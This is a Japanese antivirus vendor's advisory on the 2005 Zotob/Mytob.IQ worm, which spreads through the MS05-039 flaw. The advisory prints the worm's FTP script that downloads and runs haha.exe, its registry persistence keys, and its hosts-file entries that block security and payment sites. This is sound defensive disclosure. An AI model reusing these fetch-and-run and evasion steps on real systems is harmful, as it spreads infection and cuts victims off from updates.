キヤノンITソリューションズ株式会社 閉じる

ウイルス情報  
最新ウイルス定義ファイルバージョン : 12381
(2015/10/09 17:02)


最新ウイルス情報 : Win32/MyTob.IQ
公開日:2005年08月19日
このウイルスに関する危険度 :■■■□□

ウイルス名Win32/Mytob.IQ
別名:W32/Zotob.A,W32/Zotob.worm, Zotob.A, Zotob-A
対応定義ファイル 1.1194(20050815) 以降
ウイルスの対処方法検出ファイルを削除してください
ウイルス駆除ツール 公開中 [ 駆除ツールについてはこちら ]
ウイルスに関する危険度 - 感染報告あり
:注意 2 :感染可能性あり :感染報告あり :感染が拡大している :深刻な被害が拡大中



Win32/Mytob.IQ(別名:Zotob.A) は、MS05-039(プラグアンドプレイサービスの脆弱性)を利用して拡散するワームです。MS05-039に関する詳細は、マイクロソフト社の情報をご参照ください。

http://www.microsoft.com/japan/technet/security/bulletin/ms05-039.mspx

アンチウイルスソフトの有無に関わらず、マイクロソフト社の情報をご参照いただき、この脆弱性を修正するプログラムを適用してください。

[内容]

参考:
以下の説明文では、Windowsオペレーティングシステムがインストールされたディレクトリを%windir% と表記しており、インストール時の設定により異なる場合があります。%windir% のサブディレクトリである"System"や"System32"は %system% と表記しています。

Win32/Mytob.IQ はUpackで圧縮されており、そのサイズは約22,528バイトです。このワームが実行されると、自分自身のコピーを%system%フォルダに" botzor.exe"というファイル名で作成します。

このワームは、自分自身の唯一のコピーだけが感染したコンピュータ上で実行されるようにします。(Mutexという仕組みで、自分自身が二重起動されないようにします。)

このワームは、作成したファイルがWindowsの再起動時に実行されるように、次のレジストリキーを追加します。

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“WINDOWS SYSTEM” = “botzor.exe”

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
“WINDOWS SYSTEM” = “botzor.exe”


このワームは、これらのレジストリキーを監視して、存在しない場合は再作成します。

また、次のレジストリーキーを変更し、WindowsNT系のOS上で、Shared Accessを無効にします。

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
“Start” = “4”

このワームは、MS05-039(プラグアンドプレイサービスの脆弱性)利用し、ランダムに生成されたIPアドレスの445番ポートへ接続を試みます。

この脆弱性を利用して、進入に成功した場合、"2pac.txt"という次のFTPコマンドが書かれたファイルをダウンロードします。

open %IP% %TCP port%
user hell rulez
binary
get haha.exe
quit

感染したコンピュータ内で、"2pack.txt"に含まれるFTPコマンドが実行されると、 このワームのコピーである"haha.exe"がダウンロードされ、実行されます。このFTPサーバは、33333番ポートを使用します。

このワームは、次のサイトにアクセスするのを避ける為、次のデータで現在のhostsファイルを上書きします。

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com

NOD32アンチウイルスは、アドバンスドヒューリスティック機能によって、ウイルス定義ファイルの更新を行なうことなくWin32/Mytob.IQ を検出することができます。

NOD32アンチウイルスは、ウイルス定義ファイルのバージョン 1.1194 にて対応しています。


このページのトップへ

(C)Canon IT Solutions Inc.